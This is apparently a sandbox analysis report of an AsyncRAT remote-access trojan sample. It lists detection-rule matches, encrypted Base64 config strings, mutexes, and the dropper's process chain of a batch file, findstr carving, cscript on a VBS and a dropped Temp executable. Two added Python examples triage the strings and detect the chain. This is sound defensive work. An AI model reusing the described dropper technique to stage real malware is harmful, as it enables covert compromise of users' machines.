Source: 6.3.cscript.exe.2a3f8d843d0.2.raw.unpack, type: UNPACKEDPE; Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 6.3.cscript.exe.2a3f8d843d0.3.raw.unpack, type: UNPACKEDPE; Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 6.3.cscript.exe.2a3f936cf80.5.unpack, type: UNPACKEDPE; Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 6.3.cscript.exe.2a3f936cf80.5.raw.unpack, type: UNPACKEDPE; Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 6.3.cscript.exe.2a3f8d843d0.1.raw.unpack, type: UNPACKEDPE; Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 7.2.x.exe.128a1a78.1.unpack, type: UNPACKEDPE; Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 6.3.cscript.exe.2a3f8d843d0.2.unpack, type: UNPACKEDPE; Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 6.3.cscript.exe.2a3f8d843d0.3.unpack, type: UNPACKEDPE; Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 7.0.x.exe.560000.0.unpack, type: UNPACKEDPE; Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: 6.3.cscript.exe.2a3f8e09dd0.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: 7.2.x.exe.128a1a78.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: 6.3.cscript.exe.2a3f8d843d0.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: 6.3.cscript.exe.2a3f8e09dd0.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: 00000006.00000003.2146063182.000002A3F8E09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: 00000006.00000003.2147613945.000002A3F936B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: 00000006.00000003.2145964652.000002A3F8D84000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: 00000006.00000003.2145895375.000002A3F8D84000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: 00000007.00000002.3113116268.0000000012891000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: 00000007.00000000.2151434038.0000000000562000.00000002.00000001.01000000.00000008.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: 00000006.00000003.2145801874.000002A3F8D84000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: 00000006.00000003.2145771458.000002A3F8DD7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: C:\ProgramData\Hoodbyunlock.exe, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: C:\Users\user\AppData\Local\Temp\x.exe, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: x.exe.6.dr, UAKhR7NJbD3KWn0Nd.cs | Cryptographic APIs: 'TransformFinalBlock'
                      Source: x.exe.6.dr, UAKhR7NJbD3KWn0Nd.cs | Cryptographic APIs: 'TransformFinalBlock'
                      Source: x.exe.6.dr, 8oKYND99avZqdoU5T.cs | Cryptographic APIs: 'TransformFinalBlock'
                      Source: 6.3.cscript.exe.2a3f8d843d0.3.raw.unpack, UAKhR7NJbD3KWn0Nd.cs | Cryptographic APIs: 'TransformFinalBlock'
                      Source: 6.3.cscript.exe.2a3f8d843d0.3.raw.unpack, UAKhR7NJbD3KWn0Nd.cs | Cryptographic APIs: 'TransformFinalBlock'
                      Source: 6.3.cscript.exe.2a3f8d843d0.3.raw.unpack, 8oKYND99avZqdoU5T.cs | Cryptographic APIs: 'TransformFinalBlock'
                      Source: 6.3.cscript.exe.2a3f8d843d0.1.raw.unpack, UAKhR7NJbD3KWn0Nd.cs | Cryptographic APIs: 'TransformFinalBlock'
                      Source: 6.3.cscript.exe.2a3f8d843d0.1.raw.unpack, UAKhR7NJbD3KWn0Nd.cs | Cryptographic APIs: 'TransformFinalBlock'
                      Source: 6.3.cscript.exe.2a3f8d843d0.1.raw.unpack, 8oKYND99avZqdoU5T.cs | Cryptographic APIs: 'TransformFinalBlock'
                      Source: 6.3.cscript.exe.2a3f936cf80.5.raw.unpack, UAKhR7NJbD3KWn0Nd.cs | Cryptographic APIs: 'TransformFinalBlock'
                      Source: 6.3.cscript.exe.2a3f936cf80.5.raw.unpack, UAKhR7NJbD3KWn0Nd.cs | Cryptographic APIs: 'TransformFinalBlock'
                      Source: x.exe.6.dr, tH946UNKBTxtVBt0RwuEFWuEY2yzTB2S.cs | Base64 encoded string: 'QYkgsc1FDvF0GNesxHOF9Wo20Eg1WaaU9mtMK9olmbel1Nrcb7gd+Z445IC48enX', 'XODUooqo9MmClRQIr10QqLJ45bFnhoJ+krMfcdq+bqxuLoWfd10x6gfppS0Hyh9Y'
                      Source: 6.3.cscript.exe.2a3f8d843d0.3.raw.unpack, tH946UNKBTxtVBt0RwuEFWuEY2yzTB2S.cs | Base64 encoded string: 'QYkgsc1FDvF0GNesxHOF9Wo20Eg1WaaU9mtMK9olmbel1Nrcb7gd+Z445IC48enX', 'XODUooqo9MmClRQIr10QqLJ45bFnhoJ+krMfcdq+bqxuLoWfd10x6gfppS0Hyh9Y'
                      Source: 6.3.cscript.exe.2a3f8d843d0.1.raw.unpack, tH946UNKBTxtVBt0RwuEFWuEY2yzTB2S.cs | Base64 encoded string: 'QYkgsc1FDvF0GNesxHOF9Wo20Eg1WaaU9mtMK9olmbel1Nrcb7gd+Z445IC48enX', 'XODUooqo9MmClRQIr10QqLJ45bFnhoJ+krMfcdq+bqxuLoWfd10x6gfppS0Hyh9Y'
                      Source: 6.3.cscript.exe.2a3f936cf80.5.raw.unpack, tH946UNKBTxtVBt0RwuEFWuEY2yzTB2S.cs | Base64 encoded string: 'QYkgsc1FDvF0GNesxHOF9Wo20Eg1WaaU9mtMK9olmbel1Nrcb7gd+Z445IC48enX', 'XODUooqo9MmClRQIr10QqLJ45bFnhoJ+krMfcdq+bqxuLoWfd10x6gfppS0Hyh9Y'
                      Source: 6.3.cscript.exe.2a3f8d843d0.2.raw.unpack, tH946UNKBTxtVBt0RwuEFWuEY2yzTB2S.cs | Base64 encoded string: 'QYkgsc1FDvF0GNesxHOF9Wo20Eg1WaaU9mtMK9olmbel1Nrcb7gd+Z445IC48enX', 'XODUooqo9MmClRQIr10QqLJ45bFnhoJ+krMfcdq+bqxuLoWfd10x6gfppS0Hyh9Y'
                      Source: Hoodbyunlock.exe.7.dr, tH946UNKBTxtVBt0RwuEFWuEY2yzTB2S.cs | Base64 encoded string: 'QYkgsc1FDvF0GNesxHOF9Wo20Eg1WaaU9mtMK9olmbel1Nrcb7gd+Z445IC48enX', 'XODUooqo9MmClRQIr10QqLJ45bFnhoJ+krMfcdq+bqxuLoWfd10x6gfppS0Hyh9Y'
                      Source: 7.2.x.exe.128a1a78.1.raw.unpack, tH946UNKBTxtVBt0RwuEFWuEY2yzTB2S.cs | Base64 encoded string: 'QYkgsc1FDvF0GNesxHOF9Wo20Eg1WaaU9mtMK9olmbel1Nrcb7gd+Z445IC48enX', 'XODUooqo9MmClRQIr10QqLJ45bFnhoJ+krMfcdq+bqxuLoWfd10x6gfppS0Hyh9Y'
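The two Base64 literals above recur in every unpacked copy of the assembly, next to TransformFinalBlock calls in UAKhR7NJbD3KWn0Nd.cs. Before spending time on key recovery it is worth checking whether such literals are merely encoded text or opaque ciphertext: decode them and look at the length and byte distribution. The Python below is an added triage example written for this report, not Joe Sandbox output and not the sample's own code. The two literals are copied from the rows above; the plaintext control string and the source fragment are constructed; treating 16-byte alignment as a block-cipher hint is a heuristic tied to the TransformFinalBlock observation, not proof of AES.

```python
"""Triage Base64 literals pulled from a decompiled .NET assembly.

Added example for this report (not Joe Sandbox output, not the sample's code).
REPORTED_LITERALS are copied from the report rows; PLAINTEXT_CONTROL and
SAMPLE_SOURCE are constructed here.
"""
import base64
import binascii
import math
import re
from collections import Counter
from typing import Dict, List

REPORTED_LITERALS = [
    "QYkgsc1FDvF0GNesxHOF9Wo20Eg1WaaU9mtMK9olmbel1Nrcb7gd+Z445IC48enX",
    "XODUooqo9MmClRQIr10QqLJ45bFnhoJ+krMfcdq+bqxuLoWfd10x6gfppS0Hyh9Y",
]
# Constructed control: Base64 of an ordinary .NET namespace string.
PLAINTEXT_CONTROL = base64.b64encode(b"System.Net").decode()

# Standalone Base64 runs of 12+ chars; neighbours must not be Base64 characters.
B64_RUN = re.compile(r"(?<![A-Za-z0-9+/=])[A-Za-z0-9+/]{12,}={0,2}(?![A-Za-z0-9+/=])")


def shannon_entropy(data: bytes) -> float:
    """Bits per byte. For short buffers the ceiling is log2(len), so compare like with like."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def triage(literal: str) -> Dict:
    """Decode one literal and classify it as text, block-aligned opaque data, or other."""
    try:
        raw = base64.b64decode(literal, validate=True)
    except (binascii.Error, ValueError):
        return {"literal": literal, "valid_base64": False}
    if not raw:
        return {"literal": literal, "valid_base64": False}
    printable = sum(32 <= b < 127 for b in raw) / len(raw)
    block_aligned = len(raw) % 16 == 0   # AES block size; heuristic only
    if printable >= 0.9:
        verdict = "decodes to text"
    elif block_aligned:
        verdict = "opaque, 16-byte aligned: consistent with block-cipher output"
    else:
        verdict = "opaque, not block aligned"
    return {
        "literal": literal,
        "valid_base64": True,
        "decoded_len": len(raw),
        "aes_block_aligned": block_aligned,
        "printable_ratio": round(printable, 2),
        "entropy": round(shannon_entropy(raw), 2),
        "verdict": verdict,
    }


def triage_source(text: str) -> List[Dict]:
    """Run triage over every Base64-looking run in a decompiled source fragment."""
    return [triage(m.group(0)) for m in B64_RUN.finditer(text)]


# Constructed fragment standing in for the decompiled class named in the report.
SAMPLE_SOURCE = (
    'string a = "' + REPORTED_LITERALS[0] + '";\n'
    'string b = "' + REPORTED_LITERALS[1] + '";\n'
    'string ns = "' + PLAINTEXT_CONTROL + '";\n'
)

if __name__ == "__main__":
    for r in triage_source(SAMPLE_SOURCE):
        print(r["literal"][:24] + "...", r["decoded_len"], r["verdict"])
```

Both reported literals decode to 48 bytes, a multiple of the AES block size, with most bytes outside printable ASCII, which is what ciphertext handed to TransformFinalBlock looks like. The practical consequence is that these strings are not useful indicators on their own: the configuration they hold only becomes readable after the decryption routine behind the report's string-decryption signature has run.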
                      Source: 6.3.cscript.exe.2a3f8d843d0.2.raw.unpack, 71HgZZRenc3pCrs5cwSvoic61CqCAuZ8.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                      Source: 6.3.cscript.exe.2a3f8d843d0.2.raw.unpack, 71HgZZRenc3pCrs5cwSvoic61CqCAuZ8.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 6.3.cscript.exe.2a3f8d843d0.3.raw.unpack, 71HgZZRenc3pCrs5cwSvoic61CqCAuZ8.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                      Source: 6.3.cscript.exe.2a3f8d843d0.3.raw.unpack, 71HgZZRenc3pCrs5cwSvoic61CqCAuZ8.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: Hoodbyunlock.exe.7.dr, 71HgZZRenc3pCrs5cwSvoic61CqCAuZ8.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                      Source: Hoodbyunlock.exe.7.dr, 71HgZZRenc3pCrs5cwSvoic61CqCAuZ8.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 6.3.cscript.exe.2a3f8d843d0.1.raw.unpack, 71HgZZRenc3pCrs5cwSvoic61CqCAuZ8.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                      Source: 6.3.cscript.exe.2a3f8d843d0.1.raw.unpack, 71HgZZRenc3pCrs5cwSvoic61CqCAuZ8.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: x.exe.6.dr, 71HgZZRenc3pCrs5cwSvoic61CqCAuZ8.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                      Source: x.exe.6.dr, 71HgZZRenc3pCrs5cwSvoic61CqCAuZ8.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 6.3.cscript.exe.2a3f936cf80.5.raw.unpack, 71HgZZRenc3pCrs5cwSvoic61CqCAuZ8.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                      Source: 6.3.cscript.exe.2a3f936cf80.5.raw.unpack, 71HgZZRenc3pCrs5cwSvoic61CqCAuZ8.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 7.2.x.exe.128a1a78.1.raw.unpack, 71HgZZRenc3pCrs5cwSvoic61CqCAuZ8.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                      Source: 7.2.x.exe.128a1a78.1.raw.unpack, 71HgZZRenc3pCrs5cwSvoic61CqCAuZ8.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: classification engine | Classification label: mal100.troj.evad.winEXE@13/12@2/3
                      Source: C:\Users\user\Desktop\x.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\x.exe.log
                      Source: C:\Users\user\AppData\Local\Temp\x.exe | Mutant created: NULL
                      Source: C:\Users\user\AppData\Local\Temp\x.exe | Mutant created: \Sessions\1\BaseNamedObjects\Wbm7f9p3u8lDajjg
                      Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3664:120:WilError_03
                      Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4268:120:WilError_03
                      Source: C:\Windows\System32\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5808
                      Source: C:\Users\user\Desktop\x.exe | File created: C:\Users\user\AppData\Local\Temp\4EuTqZFB.bat
                      Source: C:\Users\user\Desktop\x.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\4EuTqZFB.bat" "
                      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cscript.exe cscript //nologo C:\Users\user\AppData\Local\Temp\x.vbs
                      Source: x.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: x.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                      Source: C:\Users\user\Desktop\x.exe | File read: C:\Users\user\Desktop\desktop.ini
                      Source: C:\Users\user\Desktop\x.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: x.exe | ReversingLabs: Detection: 65%
                      Source: x.exe | Virustotal: Detection: 55%
                      Source: C:\Users\user\AppData\Local\Temp\x.exe | File read: C:\Users\user\AppData\Local\Temp\x.exe
                      Source: unknown | Process created: C:\Users\user\Desktop\x.exe "C:\Users\user\Desktop\x.exe"
                      Source: C:\Users\user\Desktop\x.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\x.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\4EuTqZFB.bat" "
                      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\findstr.exe findstr /e "'v" "C:\Users\user\AppData\Local\Temp\4EuTqZFB.bat"
                      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cscript.exe cscript //nologo C:\Users\user\AppData\Local\Temp\x.vbs
                      Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\x.exe C:\Users\user\AppData\Local\Temp\x.exe
                      Source: C:\Users\user\AppData\Local\Temp\x.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 5808 -s 2288
                      Source: C:\Users\user\Desktop\x.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\4EuTqZFB.bat" "
                      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\findstr.exe findstr /e "'v" "C:\Users\user\AppData\Local\Temp\4EuTqZFB.bat"
                      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cscript.exe cscript //nologo C:\Users\user\AppData\Local\Temp\x.vbs
                      Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\x.exe C:\Users\user\AppData\Local\Temp\x.exe
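The process rows above describe a four-step dropper chain: x.exe writes 4EuTqZFB.bat to %TEMP%, cmd.exe runs it, the batch runs findstr /e "'v" against its own file (findstr /e anchors the pattern at end of line, so only lines ending in 'v are selected; 'v is also a valid VBScript comment, which lets the same file carry both scripts), cscript runs x.vbs from the same directory (the redirect that writes x.vbs is not in these rows), and cmd.exe finally launches the dropped Temp\x.exe. The detection below is an added example written for this report; it is not Joe Sandbox output and not one of the Sigma rules the report cites. The process records are constructed to mirror these rows (PIDs are invented, and the field names are an assumption rather than the Sysmon schema), with a benign cmd/cscript pair included as a control.

```python
"""Flag the batch -> findstr /e -> cscript -> Temp EXE chain in process-creation events.

Added example for this report (not Joe Sandbox output, not a cited Sigma rule).
EVENTS is constructed to mirror the report's "Process created" rows; PIDs are
made up and the record fields (pid, ppid, image, cmdline) are an assumed schema.
"""
import re
from dataclasses import dataclass
from typing import Dict, List


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str      # full path of the created process
    cmdline: str    # its command line


EVENTS: List[ProcEvent] = [
    ProcEvent(1000, 1, r"C:\Users\user\Desktop\x.exe", r'"C:\Users\user\Desktop\x.exe"'),
    ProcEvent(1100, 1000, r"C:\Windows\System32\cmd.exe",
              r'C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\4EuTqZFB.bat" "'),
    ProcEvent(1200, 1100, r"C:\Windows\System32\findstr.exe",
              r'''findstr /e "'v" "C:\Users\user\AppData\Local\Temp\4EuTqZFB.bat"'''),
    ProcEvent(1300, 1100, r"C:\Windows\System32\cscript.exe",
              r"cscript //nologo C:\Users\user\AppData\Local\Temp\x.vbs"),
    ProcEvent(1400, 1100, r"C:\Users\user\AppData\Local\Temp\x.exe",
              r"C:\Users\user\AppData\Local\Temp\x.exe"),
    # Constructed benign control: a script run from a normal location must not fire.
    ProcEvent(2000, 1, r"C:\Windows\System32\cmd.exe", r"cmd.exe /c C:\Scripts\inventory.bat"),
    ProcEvent(2100, 2000, r"C:\Windows\System32\cscript.exe", r"cscript //nologo C:\Scripts\inventory.vbs"),
]

TEMP_DIR = re.compile(r"\\AppData\\Local\\Temp\\", re.IGNORECASE)
BAT_ARG = re.compile(r"\.bat\b", re.IGNORECASE)
# findstr /e: match the pattern only at end of line (the switch used in the report).
FINDSTR_END_ANCHOR = re.compile(r"(?:^|\s)/e(?:\s|$)", re.IGNORECASE)
SCRIPT_HOSTS = {"cscript.exe", "wscript.exe"}


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def chain_stages(shell: ProcEvent, children: List[ProcEvent]) -> List[str]:
    """Return the dropper stages visible under one cmd.exe instance."""
    stages: List[str] = []
    # Stage 1: the shell itself was started on a .bat living in %TEMP%.
    if TEMP_DIR.search(shell.cmdline) and BAT_ARG.search(shell.cmdline):
        stages.append("bat_in_temp")
    for child in children:
        name = basename(child.image)
        # Stage 2: findstr /e carving end-of-line-tagged lines out of a batch file.
        if name == "findstr.exe" and FINDSTR_END_ANCHOR.search(child.cmdline) and BAT_ARG.search(child.cmdline):
            stages.append("findstr_carve")
        # Stage 3: a script host run on a script in %TEMP%.
        elif name in SCRIPT_HOSTS and TEMP_DIR.search(child.cmdline):
            stages.append("script_host_temp")
        # Stage 4: an executable launched from %TEMP% by the same shell.
        elif name.endswith(".exe") and TEMP_DIR.search(child.image):
            stages.append("exe_from_temp")
    return stages


def detect_dropper_chain(events: List[ProcEvent], min_stages: int = 2) -> List[Dict]:
    """One finding per cmd.exe whose direct children show at least min_stages stages."""
    children: Dict[int, List[ProcEvent]] = {}
    for e in events:
        children.setdefault(e.ppid, []).append(e)
    findings: List[Dict] = []
    for shell in events:
        if basename(shell.image) != "cmd.exe":
            continue
        stages = chain_stages(shell, children.get(shell.pid, []))
        if len(stages) >= min_stages:
            findings.append({"shell_pid": shell.pid, "parent_pid": shell.ppid, "stages": stages})
    return findings


if __name__ == "__main__":
    for f in detect_dropper_chain(EVENTS):
        print(f"cmd.exe pid={f['shell_pid']} (parent {f['parent_pid']}): {', '.join(f['stages'])}")
```

Each stage alone is noisy (findstr /e has legitimate uses, and scripts do get run from %TEMP% by installers), so the rule scores a cmd.exe instance by how many stages appear among its direct children and reports only at two or more. Against the constructed events it reports the single cmd.exe that shows all four stages and stays quiet on the control pair.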
                      Source: C:\Users\user\Desktop\x.exe | Section loaded: mscoree.dll
                      Source: C:\Users\user\Desktop\x.exe | Section loaded: apphelp.dll
                      Source: C:\Users\user\Desktop\x.exe | Section loaded: kernel.appcore.dll
                      Source: C:\Users\user\Desktop\x.exe | Section loaded: version.dll
                      Source: C:\Users\user\Desktop\x.exe | Section loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\Desktop\x.exe | Section loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\Desktop\x.exe | Section loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\Desktop\x.exe | Section loaded: uxtheme.dll
                      Source: C:\Users\user\Desktop\x.exe | Section loaded: windows.storage.dll
                      Source: C:\Users\user\Desktop\x.exe | Section loaded: wldp.dll
                      Source: C:\Users\user\Desktop\x.exe | Section loaded: propsys.dll
                      Source: C:\Users\user\Desktop\x.exe | Section loaded: profapi.dll
                      Source: C:\Users\user\Desktop\x.exe | Section loaded: edputil.dll
                      Source: C:\Users\user\Desktop\x.exe | Section loaded: urlmon.dll
                      Source: C:\Users\user\Desktop\x.exe | Section loaded: iertutil.dll
                      Source: C:\Users\user\Desktop\x.exe | Section loaded: srvcli.dll
                      Source: C:\Users\user\Desktop\x.exe | Section loaded: netutils.dll
                      Source: C:\Users\user\Desktop\x.exe | Section loaded: windows.staterepositoryps.dll
                      Source: C:\Users\user\Desktop\x.exe | Section loaded: sspicli.dll
                      Source: C:\Users\user\Desktop\x.exe | Section loaded: wintypes.dll
                      Source: C:\Users\user\Desktop\x.exe | Section loaded: appresolver.dll
                      Source: C:\Users\user\Desktop\x.exe | Section loaded: bcp47langs.dll
                      Source: C:\Users\user\Desktop\x.exe | Section loaded: slc.dll
                      Source: C:\Users\user\Desktop\x.exe | Section loaded: userenv.dll
                      Source: C:\Users\user\Desktop\x.exe | Section loaded: sppc.dll
                      Source: C:\Users\user\Desktop\x.exe | Section loaded: onecorecommonproxystub.dll
                      Source: C:\Users\user\Desktop\x.exe | Section loaded: onecoreuapcommonproxystub.dll
                      Source: C:\Windows\System32\cmd.exe | Section loaded: cmdext.dll
                      Source: C:\Windows\System32\cmd.exe | Section loaded: apphelp.dll
                      Source: C:\Windows\System32\cscript.exe | Section loaded: version.dll
                      Source: C:\Windows\System32\cscript.exe | Section loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\cscript.exe | Section loaded: uxtheme.dll
                      Source: C:\Windows\System32\cscript.exe | Section loaded: sxs.dll
                      Source: C:\Windows\System32\cscript.exe | Section loaded: vbscript.dll
                      Source: C:\Windows\System32\cscript.exe | Section loaded: amsi.dll
                      Source: C:\Windows\System32\cscript.exe | Section loaded: userenv.dll
                      Source: C:\Windows\System32\cscript.exe | Section loaded: profapi.dll
                      Source: C:\Windows\System32\cscript.exe | Section loaded: wldp.dll
                      Source: C:\Windows\System32\cscript.exe | Section loaded: msasn1.dll
                      Source: C:\Windows\System32\cscript.exe | Section loaded: cryptsp.dll
                      Source: C:\Windows\System32\cscript.exe | Section loaded: rsaenh.dll
                      Source: C:\Windows\System32\cscript.exe | Section loaded: cryptbase.dll
                      Source: C:\Windows\System32\cscript.exe | Section loaded: msisip.dll
                      Source: C:\Windows\System32\cscript.exe | Section loaded: wshext.dll
                      Source: C:\Windows\System32\cscript.exe | Section loaded: scrobj.dll
                      Source: C:\Windows\System32\cscript.exe | Section loaded: scrrun.dll
                      Source: C:\Windows\System32\cscript.exe | Section loaded: msxml3.dll
                      Source: C:\Windows\System32\cscript.exe | Section loaded: msdart.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: mscoree.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: apphelp.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: version.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: uxtheme.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: cryptsp.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: rsaenh.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: cryptbase.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: wbemcomn.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: amsi.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: userenv.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: profapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: windows.storage.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: wldp.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: rasapi32.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: rasman.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: rtutils.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: mswsock.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: winhttp.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: ondemandconnroutehelper.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: iphlpapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: dhcpcsvc6.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: dhcpcsvc.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: dnsapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: winnsi.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: rasadhlp.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: fwpuclnt.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: sxs.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: mpr.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: scrrun.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: propsys.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: linkinfo.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: ntshrui.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: srvcli.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: cscapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: edputil.dll
